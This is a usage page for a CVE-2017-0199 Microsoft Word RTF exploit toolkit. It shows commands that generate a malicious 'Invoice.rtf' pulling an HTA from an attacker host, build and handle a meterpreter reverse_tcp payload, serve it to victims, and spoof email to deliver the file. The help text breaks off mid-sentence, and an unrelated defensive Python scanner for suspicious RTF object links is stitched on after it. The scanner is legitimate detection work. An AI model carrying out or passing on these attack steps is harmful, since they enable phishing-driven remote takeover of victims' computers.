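Generating CVE-2017-0199 exploit test files directly with a Python script
Project address:
https://github.com/bhdresh/CVE-2017-0199
CVE-2017-0199 – v2.1
CVE-2017-0199 – v2.1 is a handy Python script for testing CVE-2017-0199. It provides a quick and effective way to exploit the Microsoft RTF RCE. It can generate a malicious RTF file and deliver a metasploit/meterpreter payload to the victim without any complex configuration.
Version: Python version 2.7.13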
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + web server
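Video tutorial
https://youtu.be/43LjG7bAvpg
Usage:
The tool includes the following functions
- Automatically send generated malicious RTF to victim using email spoofing
Example:
Step 1: Generate the malicious RTF file with the following command and send it to the victim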
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/企业标志.doc
Step 2 (optional, if using an MSF payload): Generate the metasploit payload and start the handler
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Step 3: Start the toolkit in exploitation mode to deliver the payload
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Command-line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file GXG
Generate malicious RTF file:
-w rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF f
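A defensive triage sketch for the behaviour the help text above describes: a URL embedded in the RTF file and requested when the document is opened. This is an added example, not part of the toolkit or the original page; the function names, the sample bytes and the 192.0.2.10 address are constructed, and it assumes the object data is plain, unobfuscated hex.

```python
import re

# Heuristic triage for the document shape described above: an RTF whose embedded
# OLE object data carries a remote URL that Word requests when the file is opened.
URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]{3,}", re.I)
LINK_WORDS = (rb"\objautlink", rb"\objupdate")  # linked object, refreshed on open

def objdata_blobs(rtf: bytes):
    # Yield the decoded bytes of each \objdata group (hex text inside the RTF).
    for m in re.finditer(rb"\\objdata([^{}]*)", rtf):
        hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        hexchars = hexchars[: len(hexchars) & ~1]  # drop a dangling nibble
        yield bytes.fromhex(hexchars.decode("ascii"))

def scan_rtf(rtf: bytes) -> dict:
    urls = []
    for blob in objdata_blobs(rtf):
        # Link targets are usually UTF-16LE; dropping NULs exposes them as ASCII.
        for hit in URL_RE.findall(blob.replace(b"\x00", b"")):
            url = hit.decode("ascii")
            if url not in urls:
                urls.append(url)
    words = [w.decode("ascii")[1:] for w in LINK_WORDS if w in rtf]
    return {
        "is_rtf": rtf.lstrip().startswith(b"{\\rt"),
        "link_words": words,
        "urls": urls,
        # Remote URL inside object data plus auto-update: quarantine and review.
        "suspicious": bool(urls) and "objupdate" in words,
    }

def constructed_sample(url: str, auto_update: bool) -> bytes:
    # Constructed test input, not a working document: one objdata group whose
    # bytes contain the URL as UTF-16LE, with or without the auto-update words.
    blob = b"\x01\x05\x00\x00" + url.encode("utf-16-le") + b"\x00\x00\xff\xff"
    words = b"\\objautlink\\objupdate" if auto_update else b"\\objemb"
    return b"{\\rtf1{\\object" + words + b"{\\*\\objdata " + blob.hex().encode("ascii") + b"}}}"

if __name__ == "__main__":
    for name, data in [
        ("linked", constructed_sample("http://192.0.2.10/test.hta", True)),
        ("embedded", constructed_sample("http://192.0.2.10/test.hta", False)),
        ("plain", b"{\\rtf1 hello}"),
    ]:
        print(name, scan_rtf(data))
```

Documents that split or pad the hex with extra control words will slip past this regex; a full RTF parser such as rtfobj from oletools is the better fit for those.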